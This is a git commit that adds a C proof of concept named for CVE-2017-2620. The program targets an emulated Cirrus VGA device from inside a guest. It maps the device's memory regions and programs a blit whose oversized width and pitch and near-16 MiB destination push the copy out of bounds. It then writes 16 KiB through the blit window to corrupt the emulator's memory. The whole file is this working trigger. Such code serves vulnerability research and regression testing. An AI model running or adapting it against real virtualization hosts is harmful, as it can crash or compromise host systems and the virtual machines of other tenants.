add cve-2017-2620.c

1 files changed, 53 insertions, 0 deletions

diff --git a/cve-2017-2620.c b/cve-2017-2620.c
new file mode 100644
index 0000000..e9fb50f
--- /dev/null
+++ b/cve-2017-2620.c
@@ -0,0 +1,53 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/io.h>
+#include <sys/mman.h>
+
+#include "pci.h"
+#include "cirrus.h"
+
+int main(int argc, char *argv[])
+{
+    volatile uint8_t *mmio, *blit;
+    int i;
+
+    find_device("cirrus", 0x1013, 0x00b8);
+    mmio = mmap_bar(1);
+    blit = mmap_bar(0);
+    fprintf(stderr, "init ok\n");
+    sleep(1);
+
+    cirrus_setmode(mmio);
+
+    fprintf(stderr, "trying invalid cpu-to-video blit\n");
+    mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS] = CIRRUS_BLT_RESET;
+    mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS] = 0x00;
+
+    *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTWIDTH)     = 1024 * 3  - 1;
+    *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTHEIGHT)    = 1         - 1;
+    *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTPITCH) = 1024 * 3;
+    *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCPITCH)  = 1024 * 3;
+    *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTADDR)  = 16 * 1024 * 1024 - 1;
+    *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCADDR)   = 0;
+
+    mmio[BLT_OFFSET + CIRRUS_MMIO_BLTMODE] =
+        CIRRUS_BLTMODE_PIXELWIDTH24 | CIRRUS_BLTMODE_MEMSYSSRC;
+    mmio[BLT_OFFSET + CIRRUS_MMIO_BLTROP]     = CIRRUS_ROP_SRC;
+    mmio[BLT_OFFSET + CIRRUS_MMIO_BLTMODEEXT] = 0;
+    mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS]  = CIRRUS_BLT_START;
+
+    fprintf(stderr, "setup done\n");
+    sleep(1);
+
+    for (i = 0; i < 16384; i++)
+        blit[i] = 0;
+    fprintf(stderr, "blit done\n");
+    sleep(1);
+
+    exit(0);
+}